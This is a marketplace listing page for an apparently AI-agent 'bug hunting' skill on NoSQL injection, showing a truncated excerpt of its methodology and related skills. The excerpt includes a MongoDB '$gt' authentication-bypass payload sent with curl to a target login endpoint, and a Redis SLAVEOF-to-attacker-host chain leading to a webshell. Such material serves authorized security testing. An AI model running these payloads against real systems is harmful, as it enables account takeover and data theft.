hunt-nosqli

Solid

Hunt NoSQL Injection — MongoDB operator injection ($where, $regex, $gt, $ne), CouchDB, Redis command injection, auth bypass via NoSQLi, data dump. Use when target uses MongoDB/Mongoose, CouchDB, Redis, or shows NoSQL error messages.

API & Backend 1,912 stars 279 forks Updated 3 days ago NOASSERTION

Install

View on GitHub

Quality Score: 86/100

Stars 20%

100

Recency 20%

100

Frontmatter 20%

Documentation 15%

100

Issue Health 10%

License 10%

100

Description 5%

100

Skill Content

# HUNT-NOSQLI — NoSQL Injection ## Crown Jewel Targets NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High). **Highest-value chains:** - **MongoDB auth bypass** — `{"username": {"$gt": ""}, "password": {"$gt": ""}}` logs in as first user in collection (usually admin) - **$where JS injection** — if $where is enabled: blind injection → data exfil - **Redis command injection** — via SSRF or direct TCP, SLAVEOF attacker-ip → config write → webshell - **Elasticsearch injection** — _search endpoint with Groovy script injection (pre-5.0) → RCE --- ## Attack Surface Signals ### URL & Param Patterns ``` /api/users/login POST with JSON body /api/search?q= /api/find?filter= /api/query?where= Any endpoint accepting JSON body with username/password ``` ### Stack Signals | Signal | Vector | |--------|--------| | MongoDB error messages in response | Operator injection | | mongoose / monk in JS bundles | ODM patterns | | X-Powered-By: Express | Node.js + MongoDB common stack | | CouchDB/_utils UI exposed | Futon/Fauxton admin | | Redis port 6379 open (via SSRF) | CONFIG SET / SLAVEOF | | Elasticsearch :9200 open | Script injection | --- ## Step-by-Step Hunting Methodology ### Phase 1 — Auth Bypass (MongoDB) ```bash # Operator injection in JSON body curl -s -X POST https://$TARGET/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}' # Regex wildcard — m...

Details

Author: elementalsouls
Repository: elementalsouls/Claude-BugHunter
Created: 1 months ago
Last Updated: 3 days ago
Language: Python
License: NOASSERTION

Integrates with

Anthropic · AI MongoDB · Database Redis · Database Elasticsearch · Database

Similar Skills

Semantically similar based on skill content — not just same category

API & Backend Solid

hunt-sqli

Hunting skill for sqli vulnerabilities. Built from 12 public bug bounty reports including modern NoSQL injection (Rocket.Chat CVE-2021-22911 MongoDB $regex, Mongoose ORM CVE-2024-53900 $where bypass), modern ORM raw-fragment SQLi (Django CVE-2024-42005, Sequelize GHSA-wrh9-cjv3-2hpw), second-order SOQL injection (HackerOne Salesforce), time-based blind SQLi in GraphQL resolvers, and SQLi on OIDC-proxy backends. Use when hunting SQLi / NoSQLi on any target.

1,912 Updated 3 days ago

elementalsouls

API & Backend Listed

exploiting-nosql-injection-vulnerabilities

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

11 Updated yesterday

26zl

API & Backend Featured

exploiting-nosql-injection-vulnerabilities

Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.

15,448 Updated 1 weeks ago

mukul975